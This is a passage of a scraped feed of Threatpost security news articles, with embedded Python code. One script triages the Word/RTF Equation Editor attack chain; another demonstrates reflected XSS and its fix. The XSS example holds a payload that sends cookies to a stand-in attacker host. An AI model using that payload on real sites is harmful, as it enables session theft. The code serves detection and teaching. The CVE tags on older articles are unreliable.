Each year entrants attempt to hack browsers like Microsoft\u2019s Internet Explorer and Mozilla\u2019s Firefox in the challenge run by TippingPoint.\n\nIt was around this time last year that [Stephen Fewer](<https://threatpost.com/pwn2own-winner-stephen-fewer-031011/>), now with Harmony Security, [bypassed Internet Explorer 8](<https://threatpost.com/apple-safari-and-internet-explorer-8-go-down-pwn2own-iphone-next-031011/>)\u2019s DEP and ASLR to execute a successful exploit in the browser on Windows 7.\n", "cvss3": {}, "published": "2012-02-14T20:17:07", "type": "threatpost", "title": "Microsoft Fixes Critical IE, Windows Bugs with February Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:48", "id": "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "href": "https://threatpost.com/microsoft-fixes-critical-ie-windows-bugs-february-patch-tuesday-021412/76213/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:00", "description": "Microsoft said it has received 70,000 reports this week of a new Trojan disguised as an Adobe Flash Player update that will change your browser\u2019s home page and redirect a Web session to an attacker\u2019s page.\n\nThere are several clues something is amiss, namely part of the GUI for the supposed Flash 11 update is written in Turkish, and there is no scroll bar on the EULA.\n\nMicrosoft detects the file, which is spreading in emails, as [Trojan:Win32/Preflayer.A](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fPreflayer.A>). 
The malware will change the home page on Internet Explorer, Google Chrome, Mozilla Firefox and Yandex to either anasayfada[.]net or heydex[.]com.\n\n\u201cThese sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing,\u201d said Jonathan Jose, an antivirus researcher at Microsoft.\n\nWhen a victim executes the malicious file, a typical Flash Player dialog box pops up; the text of the agreement isn\u2019t entirely visible because of the lack of a scroll bar. Jose said that by highlighting the text, you\u2019re able to read it to the end and notice a condition that states the user\u2019s home page will be changed.\n\n\u201cNot having a scroll bar is a bit dodgy as most users won\u2019t realize that the program is going to change the browser\u2019s start page,\u201d he said.\n\nShould the user go ahead and click on the install button, written in Turkish, the malware executes and changes the start pages. The domains for the new start pages, as well as the domains hosting the malicious Flash update, were created within the last six months, including one on March 4 that hosts the Flash executable.\n\nJose said that in addition to changing the browser start page, the browser shortcut file may also be changed to open either of the malicious pages.\n\n\u201cIt\u2019s a fairly simple ruse \u2013 misleading file name, misleading GUI, deliberately inaccessible EULA, misleading file properties \u2013 and some of the files are even signed. And yet, we\u2019ve received over 70,000 reports of this malware in the last week,\u201d he said. \u201cSocial engineering doesn\u2019t have to be particularly sophisticated to be successful. So the message today is be wary. If you think something \u2018feels\u2019 wrong (like that missing scrollbar in the EULA) it may well be. 
Listen to those feelings and use them to protect yourself by saying \u2018no\u2019 to content you don\u2019t trust.\u201d\n", "cvss3": {}, "published": "2013-03-29T14:05:11", "type": "threatpost", "title": "Has Anyone Seen a Missing Scroll Bar? Phony Flash Update Redirects to Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T18:30:14", "id": "THREATPOST:D5CE687F92766745C002851DFA8945DE", "href": "https://threatpost.com/has-anyone-seen-missing-scroll-bar-phony-flash-update-redirects-malware-032913/77682/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:45", "description": "Typically, inbox-based attacks that include malicious Microsoft Office attachments require adversaries to trick users into enabling macros. But researchers say they have identified a new malicious email campaign that uses booby-trapped Office attachments that are macro-free.\n\nThe attacks do not generate the same type of default warning from Microsoft associated with macro-based attacks, according to research published Wednesday by [Trustwave\u2019s SpiderLabs](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/>). When opening attachments, there are no warnings or pop-ups alerting victims, researchers said.\n\nThe attack uses malicious Word attachments that activate a four-stage infection process that ultimately exploits the [Office Equation Editor vulnerability](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), patched last year by Microsoft. 
The payload is designed to steal credentials from the victim\u2019s email, FTP and browser applications.\n\nResearchers emphasized the layered nature of the attack, comparing it to a turducken, a holiday dish that stuffs a chicken into a duck, and then into a turkey.\n\n\u201cThis \u2018turducken\u2019 attack really exploits CVE-2017-11882 in the end to obtain code execution,\u201d Trustwave researchers told Threatpost in an email response to questions. Systems that have been patched for CVE-2017-11882 are not vulnerable.\n\nResearchers at Trustwave said the infection chain uses a combination of techniques that start with a .DOCX attachment. The spam originates from the Necurs botnet. Email subject lines fall into four financially related categories: \u201cTNT STATEMENT OF ACCOUNT\u201d, \u201cRequest for Quotation\u201d, \u201cTelex Transfer Notification\u201d and \u201cSWIFT COPY FOR BALANCE PAYMENT\u201d. All of the emails examined by SpiderLabs researchers had the attachment named \u201creceipt.docx\u201d.\n\n**The Turducken Attack**\n\nThe four-stage infection process begins when the .DOCX file is opened and triggers an embedded OLE (Object Linking and Embedding) object that contains external references.\n\n\u201cThis \u2018feature\u2019 allows external access to remote OLE objects to be referenced in the document.xml.rels,\u201d the researchers wrote.\n\nAccording to SpiderLabs, attackers are taking advantage of the fact that Word (.DOCX) documents created with Microsoft Office 2007 and later use the \u201c[Open XML Format](<https://msdn.microsoft.com/en-us/library/bb448854\\(v=office.12\\).aspx>)\u201c. 
The format is based on XML and ZIP archive technologies and can easily be manipulated programmatically or manually, the researchers said; the relationships part (document.xml.rels) is where the remote OLE target is declared.\n\nIn stage two, the .DOCX file triggers the download of an RTF (Rich Text Format) file.\n\n\u201cWhen the user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually an RTF file that is downloaded and executed,\u201d the researchers wrote.\n\n**Equation Editor Exploited**\n\nIt\u2019s the RTF file that exploits the Office Equation Editor vulnerability (CVE-2017-11882), which Microsoft patched in November 2017. The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as OLE items in Microsoft Word documents.\n\nIn stage three, the RTF exploit decodes text embedded in the file and launches an MSHTA command line that downloads and runs an HTML Application (HTA) file. In the fourth stage, the HTA carries an obfuscated PowerShell script that downloads and executes the remote payload, the password-stealer malware.\n\n\u201cThe malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist,\u201d said researchers.\n\nResearchers note that the number of stages and vectors used in these attacks is unusual. \u201cAnother noticeable point is that the attack uses file types (DOCX, RTF and HTA) that are not often blocked by email or network gateways, unlike the more obvious scripting languages like VBS, JScript or WSF,\u201d researchers noted. 
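The first two stages of the chain above can be triaged statically: stage one lives in the .docx relationships part (an OLE relationship with TargetMode="External" pointing at a URL), and stage two is an RTF that embeds an Equation Editor object, usually with \objupdate so Word loads it without a click. The following is an added example, not Trustwave's code or anything recovered from the campaign. It builds a constructed minimal .docx and a constructed RTF stub in memory (placeholder URL http://example.invalid/WS-word2017pa.doc, an OLE 1.0 header naming "Equation.3" with empty native data, so there is no exploit payload) and reports the indicators each stage relies on.

```python
"""Static triage for the DOCX -> RTF -> Equation Editor chain described above.
Added example; not Trustwave's code. The sample .docx and RTF are constructed
inline, and the URL is a placeholder."""
import binascii
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
# Equation Editor 3.0 class name and CLSID {0002CE02-0000-0000-C000-000000000046}
# in on-disk byte order; this is the component CVE-2017-11882 targets.
EQUATION_CLASS = b"Equation.3"
EQUATION_CLSID = bytes.fromhex("02CE020000000000C000000000000046")


def external_ole_targets(docx_bytes):
    """Stage 1: return http(s) URLs that word/_rels/document.xml.rels binds to
    an OLE object with TargetMode="External" (Word fetches them on open)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "word/_rels/document.xml.rels" not in zf.namelist():
            return []
        root = ET.fromstring(zf.read("word/_rels/document.xml.rels"))
    hits = []
    for rel in root.iter(RELS_NS + "Relationship"):
        target = rel.get("Target", "")
        if (rel.get("TargetMode") == "External"
                and rel.get("Type") == OLE_REL_TYPE
                and re.match(r"(?i)https?://", target)):
            hits.append(target)
    return hits


def rtf_equation_objects(rtf_bytes):
    """Stage 2: flag embedded OLE objects whose class is Equation Editor, plus the
    \\objupdate control word that makes Word load the object without a click."""
    classes = [m.group(1).strip()
               for m in re.finditer(rb"\\\*\\objclass\s*([^{}\\]+)", rtf_bytes)]
    decoded = []
    for m in re.finditer(rb"\\\*\\objdata\s*([0-9A-Fa-f\s]+)", rtf_bytes):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        hexdata = hexdata[:len(hexdata) - len(hexdata) % 2]  # tolerate truncation
        decoded.append(binascii.unhexlify(hexdata))
    is_equation = (any(c.startswith(b"Equation") for c in classes)
                   or any(EQUATION_CLASS in d or EQUATION_CLSID in d for d in decoded))
    return {
        "object_classes": [c.decode("latin-1") for c in classes],
        "equation_editor_object": is_equation,
        "auto_update": rb"\objupdate" in rtf_bytes,
    }


def build_sample_docx(target):
    """Constructed minimal .docx (not a real lure) whose relationships part points
    an OLE object at `target`, the way stage 1 of the chain does."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS[1:-1]}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" Target="{target}" '
        'TargetMode="External"/></Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<Types xmlns="http://schemas.'
                    'openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", '<w:document xmlns:w="http://schemas.'
                    'openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed OLE 1.0 header for an embedded "Equation.3" object as it appears in
# \objdata. Native data is empty: real lures carry the overflowing MTEF font-name
# record here; this stub only exercises the detection.
OBJDATA_HEX = ("01050000"                 # OLE version
               "02000000"                 # format: embedded object
               "0b000000"                 # class name length (11, incl. NUL)
               "4571756174696f6e2e3300"   # "Equation.3\0"
               "00000000" "00000000"      # topic / item name lengths
               "00000000")                # native data length
SAMPLE_RTF = (rb"{\rtf1\ansi{\object\objemb\objupdate{\*\objclass Equation.3}"
              rb"{\*\objdata " + OBJDATA_HEX.encode() + rb"}{\result{\pict}}}}")
SAMPLE_URL = "http://example.invalid/WS-word2017pa.doc"  # placeholder, constructed


def triage():
    """Run both stage checks over the constructed samples."""
    return {
        "docx_external_ole": external_ole_targets(build_sample_docx(SAMPLE_URL)),
        "rtf": rtf_equation_objects(SAMPLE_RTF),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Run against a real attachment, `external_ole_targets` is the gateway-side check for stage one (a remote oleObject relationship has no legitimate reason to appear in an invoice), and `rtf_equation_objects` flags the stage-two download before Equation Editor ever parses it; the CLSID match covers objdata blobs that embed a compound file rather than the bare class name string.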
\u201cIn the end, be wary of unknown or unexpected Office documents and keep your patches up to date.\u201d\n", "cvss3": {}, "published": "2018-02-15T12:31:26", "type": "threatpost", "title": "Word-based Malware Attack Doesn\u2019t Use Macros", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-02-15T12:31:26", "id": "THREATPOST:B4579714760429B9531FF0E79E44C578", "href": "https://threatpost.com/word-based-malware-attack-doesnt-use-macros/129969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "In a move that has surprised many in the security community, Microsoft has disbanded its Trustworthy Computing unit, the group that was responsible for the pioneering work that helped reverse the company\u2019s security reputation and make Windows a much more secure and reliable computing platform.\n\nThe end of the TwC group comes as Microsoft is in the middle of a major shift. The company on Thursday announced it was laying off 2,100 employees and also that it was closing its research facility in Silicon Valley. Under the changes in the security group at Microsoft, some of the TwC employees will be reassigned to the Cloud and Enterprise division and others will wind up in the legal group. The move presumably is an effort to integrate the security and privacy expertise in the TwC group into the rest of the company.\n\nThe break-up of the TwC group marks the end of an era at Microsoft, an era that began with the [memo that Bill Gates sent](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089>) to company employees in January 2002. 
Microsoft had been under fire from some of its larger customers\u2013government agencies, financial companies and others\u2013about the security problems in Windows, issues that were being brought front and center by a series of self-replicating worms and embarrassing attacks. Gates realized that the company was in danger of losing a large chunk of business if it didn\u2019t start making some changes regarding security, so he made the development of more secure products and platforms a top priority for all of Microsoft.\n\nThat began with putting developers through security training and also included stopping production on a major update to Windows in order to get the security of it right. It continued with Microsoft hiring security researchers, privacy experts and top software security people and eventually led to the creation of the Trustworthy Computing group. Gates\u2019s memo contemplated many of the changes that would come to computing, as well as the threats that would emerge.\n\n\u201cIn the past, we\u2019ve made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We\u2019ve done a terrific job at that, but all those great features won\u2019t matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security. Our products should emphasize security right out of the box, and we must constantly refine and improve that security as threats evolve. A good example of this is the changes we made in Outlook to avoid email borne viruses. If we discover a risk that a feature could compromise someone\u2019s privacy, that problem gets solved first. If there is any way we can better protect important data and minimize downtime, we should focus on this. 
These principles should apply at every stage of the development cycle of every kind of software we create, from operating systems and desktop applications to global Web services,\u201d he wrote in the [memo](<http://www.computerbytesman.com/security/billsmemo.htm>).\n\n\u201cGoing forward, we must develop technologies and policies that help businesses better manage ever larger networks of PCs, servers and other intelligent devices, knowing that their critical business systems are safe from harm. Systems will have to become self-managing and inherently resilient. We need to prepare now for the kind of software that will make this happen, and we must be the kind of company that people can rely on to deliver it.\u201d\n\nOver the years, the TwC group accomplished much of that, and more. Breaking the group up may disperse into the rest of the company the expertise that\u2019s been concentrated in TwC, enabling the security experts to work more closely with the engineering teams and other groups inside the company. Or it may lead to an exodus of talent from Redmond. Either way, it signals a turning point for Microsoft and its decade-long effort to make security a priority. Computing has evolved dramatically in that time, as have Microsoft\u2019s product offerings, priorities and challenges. 
Microsoft\u2019s decision to eliminate the TwC group is just another indication of those changing times.\n", "cvss3": {}, "published": "2014-09-19T11:43:52", "type": "threatpost", "title": "Era Ends With Break Up of Trustworthy Computing Group at Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:58:40", "id": "THREATPOST:90355E85731E1618F6C63A58CD426966", "href": "https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "description": "[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/10/07040458/andrew_storms.jpg>)On Oct. 9, 2003, Microsoft announced its new security patching process that would end up being a catalyst for significant change in the information security community. Ten years ago, the program was announced with a press release that promised\n\n * \u201cImproved patch management processes, policies and technologies to help customers stay up to date and secure.\u201d\n * \u201cGlobal education programs to provide better guidance and tools for securing systems.\u201d\n\nWithin the [press release](<http://www.prnewswire.com/news-releases/microsoft-outlines-new-initiatives-in-ongoing-security-efforts-to-help-customers-72447792.html>), chief executive officer Steve Ballmer said: \u201cOur goal is simple: Get our customers secure and keep them secure. Our commitment is to protect our customers from the growing wave of criminal attacks.\u201d\n\nThose of us working in the security industry or with corporate information security responsibility saw this as a direct response from the famous [Trustworthy Computing memo](<http://www.microsoft.com/en-us/news/features/2012/jan12/gatesmemo.aspx>) penned by Bill Gates in January 2002. The signs were clear. Microsoft was faced with a serious dilemma. 
Its software was riddled with security holes that were having a direct negative effect on its customers\u2019 security, availability and privacy. In corporate IT, Microsoft had quickly gotten its own nickname of \u201cnecessary evil.\u201d IT managers were forced to use Microsoft software for its business features, but it came at the cost of serious security risks.\n\nWhether you like or disdain Microsoft, the new security initiatives started 10 years ago created a great wave of change in our information security industry.\n\nFor starters, Microsoft proved to the security community that communication is a key cornerstone of vendor relationships. No one likes to admit they have security problems. Microsoft took the leap of not only admitting it had a problem, but also committing to ongoing communication with its customers and with all computing users. Microsoft started blogging about security issues and also embarked on serious outbound communication campaigns to educate users.\n\nMicrosoft showed that communication and relationships are a two-way street. The powerhouse eventually grew to an age where it embraced the same community of people who were responsible for finding and publicly releasing security holes in its software. Today, public disclosure of serious Microsoft security holes is the exception.\n\nAlso, resource planning is table stakes in the enterprise IT world. Being a cost center doesn\u2019t help much, and IT has traditionally been underfunded and underappreciated. What is an enterprise IT or security manager supposed to do when their primary software vendor springs on them a critical security patch with do-or-die consequences? Historically, and still the case today, a lot of ongoing projects get dropped to quickly reallocate resources to the moment\u2019s critical security patch. 
Living in a world of constant interruption is detrimental to morale and to the completion of any planned projects.\n\nWith Microsoft\u2019s new, consistent patch release timing, enterprise IT could depend on a schedule and allocate resources accordingly. The monthly patching cycle soon became better known as Patch Tuesday. Later in Microsoft\u2019s maturity model, it would introduce the Advance Notification Service. We know this today as the Thursday before Patch Tuesday, when we receive a high-level snippet of what to expect the following week.\n\nMicrosoft also proved the value of consistency in other ways. For example, Microsoft took the early, bold step of defining its security criticality ratings and making the definitions public. Even Microsoft\u2019s security bulletin text format and sections were delivered in a consistent format that security professionals have come to rely upon. Security people like repeatable and dependable systems. Microsoft delivered just that.\n\nThree cheers for Patch Tuesday. It\u2019s the second Tuesday of each month that we both love and hate. Ten years ago, the Patch Tuesday initiatives created profound benefits for all Microsoft customers by making it easier to keep systems patched and more secure. At the time, the idea seemed so foreign, but it has since gained so much following that other vendors such as Cisco, Adobe and Oracle have followed suit. 
Spend just five minutes today and consider where you\u2019d be without Microsoft taking the leap 10 years ago.\n\n_Andrew Storms is the Director of DevOps for CloudPassage._\n", "cvss3": {}, "published": "2013-10-02T09:40:46", "type": "threatpost", "title": "A Decade of Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-10-07T15:44:02", "id": "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "href": "https://threatpost.com/take-time-to-reflect-as-microsoft-patch-tuesday-turns-10/102488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:21", "description": "CANCUN \u2013 Bounty programs are mislabeled creatures, too often pigeonholed as a payoff for finding individual vulnerabilities in software.\n\nWrong.\n\n\u201cThe name bug bounty is actually a false categorization of what is truly just an incentive program,\u201d said Katie Moussouris, chief policy officer at HackerOne and architect of Microsoft\u2019s vulnerability coordination program, during her talk today at the Security Analyst Summit. \u201cYou are creating an incentive for whatever you want. It\u2019s not just individual bugs all the time.\u201d\n\nThat means organizations interested in nurturing their own programs should think not only about finding and fixing one-off bugs, but also about strategic goals such as eliminating entire classes of vulnerabilities and encouraging contributors to build mitigations. 
Architected correctly, vulnerability incentive programs can also feed an enterprise software development lifecycle and reduce the number of bugs that leak into production.\n\nAnd don\u2019t live under the illusion that you\u2019ll never have to contract a pen-tester again.\n\n\u201cThere\u2019s a time and place to get specialists under contract to look at things you don\u2019t want to open to the world; that\u2019s where a pen test comes in,\u201d Moussouris said. \u201cYou cannot replace pen-tests whole-heartedly. It\u2019s playing whack-a-bug if you\u2019re not feeding your bug bounty program results into your SDL.\u201d\n\nFor its part, Microsoft was standoffish about dipping into the bug bounty waters. And for good reason. As Moussouris explains it, for so long, researchers who wanted to find Windows or Internet Explorer bugs were only after credit in a Patch Tuesday security bulletin. Often, those were career boosters, she said. Even established third-party programs such as the Zero Day Initiative were contributing bugs to Microsoft gratis.\n\nBut as vulnerability brokers and companies such as VUPEN and ReVuln emerged, the market began to exert its pressures on Microsoft. 
Moussouris had to turn part politician inside the walls of Redmond and convince the powers that be to provide incentives for researchers not to give in to the six-figure seduction of the vulnerability market, and to renew relationships with white-hats.\n\nThe end result was a number of specialized bounties sponsored by Microsoft, including a $100,000 mitigation bypass bounty, the BlueHat Bonus for Defense and a temporary Internet Explorer bounty.\n\nIn each case, there were carrots Microsoft was dangling in front of researchers that others in the market were not.\n\n\u201cAgain, this isn\u2019t a bounty, it\u2019s an incentive,\u201d Moussouris said.\n\nYet it still wasn\u2019t good enough, Moussouris said, remembering how she had to convince Microsoft to begin paying for bug submissions in IE 10 while that version of the browser was in beta. She treasures a chart that shows a huge spike in bug submissions once IE 10 was released to manufacturing, many of them critical vulnerabilities that would be fixed in security bulletins.\n\n\u201cThere were no incentives if Microsoft fixed a bug during beta; no bulletin, no credit, no incentives during that period,\u201d Moussouris said. \u201cWhat if we create an incentive beta program if there were no buyers in town?\u201d\n\nThe bounty program was extended into beta, giving Microsoft first crack at bugs before they were out in the open market. And they were fixed on the cheap, too. For IE 10 in beta, there were 23 submissions, 18 of which would have been rated critical, including four sandbox escapes, Moussouris said. 
The payout: $28,000, an average payout of $1,100.\n\n\u201cIf you create an incentive at the right time, you will absolutely get the results you want,\u201d Moussouris said.\n", "cvss3": {}, "published": "2015-02-16T13:59:58", "type": "threatpost", "title": "Lessons Learned in Building a Vulnerability Coordination Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-16T20:06:46", "id": "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "href": "https://threatpost.com/dont-build-a-bounty-program-build-an-incentive-program/111103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "[](<https://threatpost.com/us-reigns-most-bot-infected-country-101310/>)The U.S. has by far the highest number of bot-infected computers of any country in the world, with nearly four times as many infected PCs as the country in second place, Brazil, according to a new report by Microsoft. The quarterly report on malicious software and Internet attacks shows that while some of the major botnets have been curtailed in recent months, the networks of infected PCs still represent a huge threat.\n\nThe data on botnets, published in [Microsoft\u2019s Security Intelligence Report](<https://www.microsoft.com/security/sir/default.aspx>) for the first half of 2010, paints a somewhat bleak picture of the botnet landscape. Between January and June of this year, Microsoft cleaned more than 6.5 million machines worldwide of bot infections, which represents a 100 percent increase in bot infections from the same period in 2009. This increase comes at a time when there is more attention than ever focused on the botnet problem, both by security researchers and law-enforcement agencies around the world.\n\nMicrosoft measures botnet infections by counting the number of machines that are cleaned of bots by using the company\u2019s Malicious Software Removal Tool. 
The Microsoft data obviously does not show a complete picture of bot infections across the entire Internet, but gives a snapshot of the infection problem on the machines the company monitors.\n\nIn the last year or so, several major spam botnets have been either completely crippled or in some way damaged by takedown efforts that target the command and control servers that run the botnets. Pushdo and Waledac are the two most prominent examples of this effort, and Microsoft officials were deeply involved in the [takedown of Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>), eventually going to court in September to get legal ownership of hundreds of IP addresses used by the botnet.\n\nThe company worked with researchers in Germany and Austria, as well as law-enforcement agencies, to gain control of the Waledac C&C servers. However, while the takedown was something of a coup, Waledac was not the top spam botnet, and Microsoft\u2019s data shows that there are still a number of large botnets, many of which are far less well-known than Waledac, Pushdo and Zeus, that are wreaking havoc online.\n\nThe most commonly detected bot client in the new SIR is Rimecud, the main piece of malware that is responsible for the Mariposa botnet. In the first half of 2010, Microsoft cleaned more than 3.5 million PCs infected with Rimecud. Some of the more famous botnets, including Rustock, Nuwar and Zbot, are pretty far down the list of the most active botnets.\n\n\u201cRimecud is a \u2018kit\u2019 family: different people working independently use a malware creation kit to create their own Rimecud botnets. Rimecud is the primary malware family behind the so-called Mariposa botnet, which infected millions of computers around the world in 2009 and 2010. 
In July of 2010, the Slovenian Criminal Police arrested a 23-year-old Slovenian citizen suspected of writing the malware code, following the February 2010 arrests of three suspected Mariposa botnet operators by the Spanish Guardia Civil,\u201d Microsoft said in the report. \u201cRimecud is a backdoor worm that spreads via fixed and removable drives, and by sending malicious hyperlinks to a victim\u2019s contacts via several popular instant messaging programs. Rimecud can be commanded to take a number of typical botnet actions, including spreading itself via removable drives, downloading and executing additional malware, and stealing passwords.\u201d\n\nRimecud is unlike many other botnets as it has its own network protocol, based on UDP, that it uses for communications between the bots and the C&C servers. A number of other botnets use modified, or somewhat customized, protocols for communication, making it more difficult for researchers to analyze the botnet\u2019s behavior. The attackers behind these botnets have become increasingly intelligent and sophisticated in recent years, and they have learned from their past mistakes, as well as the actions of researchers and law-enforcement agencies. \n\nOne of the key methods attackers have adopted to make life more difficult for researchers is to not use off-the-shelf bot software, but instead buy kits that can create custom bots.\n\n\u201cThese kits are collections of tools, sold and shared within the malware underground, that enable aspiring bot-herders to assemble their own botnet by creating and spreading customized malware variants. Several malware kits are freely available for downloading and sharing; some have been published as open source code, which enables malware developers to create modified versions of the kits. Other kits are developed by individual groups and sold like legitimate commercial software products, sometimes even including support agreements,\u201d Microsoft said in the report. 
\n", "cvss3": {}, "published": "2010-10-13T16:07:04", "type": "threatpost", "title": "U.S. Reigns As Most Bot-Infected Country", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:36", "id": "THREATPOST:49045E816279C72FD35E91BF5F87387C", "href": "https://threatpost.com/us-reigns-most-bot-infected-country-101310/74570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:55", "description": "[](<https://threatpost.com/new-flaw-found-microsoft-sharepoint-042910/>)There is a [cross-site scripting flaw in SharePoint 2007](<http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html>), Microsoft\u2019s collaboration product, which could give an attacker the ability to run arbitrary JavaScript in a victim\u2019s browser in the context of the SharePoint site. \n\nHigh-Tech Bridge, a Swiss security firm, published an advisory about the vulnerability on Thursday, along with proof-of-concept code to demonstrate the exploit. \n\n\u201cThe vulnerability exists due to failure in the \u201c/_layouts/help.aspx\u201d script to properly sanitize user-supplied input in \u201ccid0\u201d variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data,\u201d the company said in its advisory.\n\nMicrosoft\u2019s Security Response Center said it is working on mitigations, workarounds and a fix for the vulnerability. 
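The advisory quoted above gives the bug only in outline: the help page reflects the cid0 parameter into its HTML without encoding it. What follows is an added example, not High-Tech Bridge's proof-of-concept and not SharePoint's own code: a hypothetical Python stand-in for such a page, first echoing the parameter verbatim and then with output encoding for the contexts it lands in, plus the check a tester runs to see whether a marker comes back unchanged. The host names, the page markup and the payload are constructed for the example.

```python
"""Reflected XSS through an unencoded request parameter, in the shape of the help.aspx 'cid0' case.

Added example; the page layout and host names are assumptions, not SharePoint's markup.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit


def _cid0(url: str) -> str:
    """Pull the cid0 query parameter out of a request URL (empty string if absent)."""
    return parse_qs(urlsplit(url).query).get("cid0", [""])[0]


def render_help_vulnerable(url: str) -> str:
    """Hypothetical help page that echoes cid0 verbatim into an attribute and a text node.
    Whatever markup the parameter carries becomes markup in the response."""
    cid0 = _cid0(url)
    return f'<html><body><h1>Help</h1><div id="{cid0}">Topic: {cid0}</div></body></html>'


def render_help_fixed(url: str) -> str:
    """Same page with output encoding for the HTML attribute and text contexts.
    html.escape(quote=True) turns < > & " ' into entities, so the value can neither
    close the attribute it sits in nor open a new tag."""
    safe = html.escape(_cid0(url), quote=True)
    return f'<html><body><h1>Help</h1><div id="{safe}">Topic: {safe}</div></body></html>'


def reflects_unescaped(page: str, marker: str) -> bool:
    """Tester's check: does the raw marker come back in the response body unchanged?"""
    return marker in page


# Constructed test input: closes the id attribute and the tag, then runs script that leaks the cookie.
PAYLOAD = '"><script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
REQUEST = "http://sharepoint.example/_layouts/help.aspx?cid0=" + quote(PAYLOAD, safe="")

if __name__ == "__main__":
    print("vulnerable page reflects <script>:", reflects_unescaped(render_help_vulnerable(REQUEST), "<script>"))
    print("fixed page reflects <script>:     ", reflects_unescaped(render_help_fixed(REQUEST), "<script>"))
```

An HttpOnly flag on the session cookie would blunt the cookie-theft part of the advisory's impact statement but none of the rest; the fix is to encode the value for the context it is written into, here an attribute and a text node, which html.escape(quote=True) covers.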
